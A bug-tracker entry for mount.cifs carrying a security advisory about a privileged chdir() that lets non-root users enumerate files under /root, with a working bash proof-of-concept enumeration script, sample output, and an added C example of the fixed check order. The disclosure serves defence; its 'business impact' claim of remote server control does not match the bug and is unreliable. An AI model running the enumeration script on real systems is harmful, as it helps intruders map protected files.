Bug 8800 - mount.cifs arbitrary file identification as root
Summary: mount.cifs arbitrary file identification as root
Status: RESOLVED DUPLICATE of bug 8821
Alias: None
Product: CifsVFS
Classification: Unclassified
Component: user space tools
Version: 2.6
Hardware: All All
Importance: P5 major
Target Milestone: ---
Assignee: Jeff Layton
QA Contact:
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2012-03-07 19:11 UTC by Jesus
Modified: 2012-04-02 12:34 UTC
CC List: 0 users

See Also:


Attachments
advisory (2.81 KB, application/octet-stream), 2012-03-07 19:11 UTC, Jesus

Description Jesus 2012-03-07 19:11:01 UTC
Created attachment 7363: advisory

For example, /root/secretfile can be identified, because any user can control the privileged chdir() and infer the response.

The chdir() should maybe be launched after the fstab check, and only over fstab directories.



########## Blueliv Advisory 2011-002 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
###############################################

1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir();
this leads to arbitrary file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU software) is part of the Linux base system, and is setuid on
most distributions.

This software mounts CIFS partitions to directories authorized by fstab.




3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible, via the second parameter,
to control a privileged chdir() syscall and infer its return value through
the responses.

This implies a small security breach in Linux permissions: a non-root user
can enumerate files and directories as root.

This can help to exploit other vulnerabilities: enumerate /root/ contents,
descriptors used by any process, user homes, etc.

One of the attack vectors is a /root/ directory scan:

[sha0@spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile

dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

It also allows enumerating sub-subdirectories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com
# discover root protected files & directories, user homes, process descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.

This method of transferring files is highly dangerous and can lead to remote control of the server.


6. SYSTEMS AFFECTED
-------------------------
All versions are affected.

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
Blueliv SL


10. DISCLOSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
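An added illustration of the ordering the reporter proposes in section 7 (authorize against fstab before any privileged filesystem access). This is example code written for this page; it is not code from the bug report, the advisory, or cifs-utils. The allowlist entries, the probe counter and the function names are constructed for the illustration: the leaky order probes the path as root before the fstab check, so errno reveals existence and file type for any path; the hardened order rejects unauthorized paths with a constant error and no syscall, and performs the remaining probe with effective privileges switched to the calling user when running setuid-root.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for the fstab entries an unprivileged user may mount.
 * "/tmp" is included only so the example can run on any host. */
static const char *const allowed_mountpoints[] = { "/mnt/share", "/home/alice/smb", "/tmp" };
static const size_t allowed_count = sizeof(allowed_mountpoints) / sizeof(allowed_mountpoints[0]);

/* Number of filesystem probes issued so far; lets a caller confirm that an
 * unauthorized request never reaches the filesystem. */
int fs_probe_count = 0;

/* Authorization is a pure string comparison: no syscall, so it leaks nothing
 * about the filesystem. Real code would canonicalize the path first, and must
 * do that canonicalization unprivileged for the same reason. */
int mountpoint_authorized(const char *path)
{
    for (size_t i = 0; i < allowed_count; i++)
        if (strcmp(path, allowed_mountpoints[i]) == 0)
            return 1;
    return 0;
}

/* The order the advisory describes: the path is probed with root's privileges
 * before the fstab check, so errno (ENOENT, ENOTDIR, EACCES) reveals existence
 * and type of any path, authorized or not. */
int leaky_mount_check(const char *path, int *err_out)
{
    struct stat st;
    fs_probe_count++;
    if (stat(path, &st) < 0) { *err_out = errno; return -1; }
    if (!S_ISDIR(st.st_mode)) { *err_out = ENOTDIR; return -1; }
    if (!mountpoint_authorized(path)) { *err_out = EPERM; return -1; }
    return 0;
}

/* Hardened order: authorize first, with zero filesystem access, so every
 * unauthorized path fails identically with EPERM. Only then probe, and do so
 * with effective uid/gid switched to the real user when running setuid-root,
 * so the kernel enforces the caller's permissions rather than root's. */
int hardened_mount_check(const char *path, int *err_out)
{
    if (!mountpoint_authorized(path)) { *err_out = EPERM; return -1; }

    uid_t ruid = getuid();
    gid_t rgid = getgid();
    int dropped = 0;
    if (geteuid() == 0 && ruid != 0) {
        /* setegid before seteuid: once euid is non-root, setegid would fail */
        if (setegid(rgid) != 0 || seteuid(ruid) != 0) { *err_out = errno; return -1; }
        dropped = 1;
    }

    struct stat st;
    fs_probe_count++;
    int rc = stat(path, &st);
    int saved_errno = errno;

    if (dropped) {
        /* Restore root for the actual mount(2); give up if that fails. */
        if (seteuid(0) != 0 || setegid(0) != 0) { *err_out = errno; return -1; }
    }

    if (rc < 0) { *err_out = saved_errno; return -1; }
    if (!S_ISDIR(st.st_mode)) { *err_out = ENOTDIR; return -1; }
    *err_out = 0;
    return 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/root/secretfile";
    int err;
    if (hardened_mount_check(path, &err) == 0)
        printf("%s: authorized mount point\n", path);
    else
        printf("%s: refused (%s), filesystem probes so far: %d\n",
               path, strerror(err), fs_probe_count);
    return 0;
}
```

Run unprivileged with any path outside the allowlist and the refusal is the same EPERM with zero probes, whether or not the path exists; that constant response is what removes the oracle. The privilege toggle only engages when the binary is actually setuid-root, so the example behaves identically (minus the toggle) when run as an ordinary user.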
Comment 1 Jeff Layton 2012-04-02 12:34:00 UTC

*** This bug has been marked as a duplicate of bug 8821 ***